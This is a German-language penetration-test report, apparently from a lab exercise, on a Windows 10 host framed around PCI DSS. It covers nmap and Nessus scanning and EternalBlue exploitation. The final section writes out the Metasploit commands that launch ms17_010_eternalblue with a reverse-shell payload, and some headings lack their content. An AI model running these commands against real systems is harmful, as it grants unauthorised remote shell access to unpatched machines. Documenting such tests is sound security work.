
Dieser Bericht beschreibt eine strukturierte VAPT-Engagement mit Fokus auf PCI DSS-Konformität, SMB-Dienst-Enumeration und Ausnutzung von CVE-2017-0144 (EternalBlue) auf einem Windows 10-Rechner innerhalb einer finanzorientierten Infrastruktur.
Finanzinstitute stehen vor einigen der strengsten Compliance-Anforderungen im Bereich der Cybersicherheit. Da sensible Kundendaten und Karteninhaberinformationen auf dem Spiel stehen, können Sicherheitsfehlkonfigurationen zu katastrophalen Sicherheitsverletzungen führen. Diese VAPT-Simulation wurde durchgeführt, um die Sicherheitslage eines Windows 10-basierten Endpunktsystems aus Sicht der PCI DSS-Compliance zu bewerten und gleichzeitig bekannte Schwachstellen in exponierten SMB-Diensten zu identifizieren und auszunutzen.
Die Simulation umfasst mehrere Phasen – von der Aufklärung und Schwachstellenscanning mit Nessus bis hin zur realen Ausnutzung über Metasploit. Der Bericht unterstreicht zudem die Bedeutung von Endpunkt-Härtung, Patch-Management, Firewall-Durchsetzung und PCI DSS-Ausrichtung für die Aufrechterhaltung der Integrität von Finanznetzwerken.
Erstellt von: Aditya Bhatt
Position: VAPT-Analyst | Cybersecurity-Experte
Kontakt: [email protected] | +91-9818993884
Dieser Bericht präsentiert die Ergebnisse eines Penetrationstests, der an einem Windows 10-Endpunkt durchgeführt wurde, der mutmaßlich Finanzdaten und Kreditkartentransaktionen verarbeitet. Ziel war es, die Implementierung von PCI DSS-Kontrollen zu validieren und potenzielle Angriffsvektoren zu identifizieren, die Karteninhaberdaten gefährden könnten.
Mithilfe von Nessus wurde festgestellt, dass der Host anfällig für CVE-2017-0144 (EternalBlue) ist – eine kritische SMB-Schwachstelle. Das Metasploit-Framework wurde anschließend verwendet, um diesen Fehler auszunutzen und nicht autorisierten Remote-Shell-Zugriff zu erlangen. Dieser Bericht hebt die Bedeutung eines rechtzeitigen Patch-Managements und der Härtung von Netzwerkdiensten hervor, um Datenverstöße in Finanzsystemen zu vermeiden.
Sechs Hauptziele und zwölf Anforderungen des PCI DSS wurden überprüft. Zu den wichtigsten Grundsätzen gehören:
Zielsystem:
10.10.195.105255.0.0.0Verwendete Tools:
Wichtige Befehle:
nmap -sn 10.10.195.105
nmap -sV -p445 10.10.195.105
nmap -F 10.10.195.105
Scanner:
Versuch des Nessus-Scans:
Versuch des Metasploit-Scans:
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run
Exploit-Modul:
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit